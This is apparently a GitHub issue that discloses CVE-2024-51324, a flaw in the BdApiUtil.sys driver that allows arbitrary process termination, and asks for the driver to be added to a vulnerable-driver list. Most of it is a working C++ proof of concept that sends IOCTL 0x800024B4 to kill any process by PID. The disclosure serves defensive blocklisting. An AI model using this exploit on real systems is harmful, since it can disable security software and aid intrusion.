Request to add vulnerable driver BdApiUtil.sys (CVE-2024-51324)

[christopher-ellis-workday]

Was hoping to get BdApiUtil.sys added to this as a vulnerable driver. I wasn't sure the best place to do that, so opened an issue.

Summary:
I found an IOCTL code which takes a PID and terminates it (arbitrary process termination). Admin privileges required to install the driver, but if it's already installed, can be called by any user (non admin).

Here's the specific version I tested against in VT (likely other versions vulnerable too):

https://www.virustotal.com/gui/file/06e06ae13911ada97cc955379a0697a7698192699dcfde5c197318fa024911b1

IOCTL needed is 0x800024B4

PoC:

#include <windows.h>
#include <stdio.h>
#include <iostream>

int main() {

	#define IOCTL_TERMINATE_PROCESS 0x800024B4
	#define DEVICE_NAME L"\\\\.\\BdApiUtil"

	unsigned int pid;


	//1. Open a handle to the driver
	HANDLE hDriver = CreateFile(
		DEVICE_NAME,
		GENERIC_READ | GENERIC_WRITE,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);


	if (hDriver == INVALID_HANDLE_VALUE) {
		printf("Error opening device: %d\n", GetLastError());
		return 1;
	}

	//Get the PID of the process to terminate
	printf("PID please : \n");
	scanf_s("%u", &pid);

	//2. Send a code to the driver
	DWORD bytesReturned = 0;
	BYTE outBuffer[256];

	BOOL ioctlResult = DeviceIoControl(
		hDriver,
		IOCTL_TERMINATE_PROCESS,
		&pid,
		sizeof(pid),
		NULL,
		0,
		&bytesReturned,
		NULL
	);

	if (!ioctlResult) {
		printf("Killing IOCTL failed with error: %d\n", GetLastError());
	}
	else {
		printf("DeviceIoControl succeeded.\n");

		//Print the output buffer in hexadecimal
		for (int i = 0; i < bytesReturned; i++) {
			printf("%02X ", outBuffer[i]);
		}
		printf("\n");

		//Print the output as string just in case
		printf("Output Buffer as String: %s\n", outBuffer);
	}


	//Cleanup
	CloseHandle(hDriver);

	std::cout << "sent the IOCTL: " << std::endl;
	std::cout << "Bytes returned: " << bytesReturned << std::endl;
	return 0;
}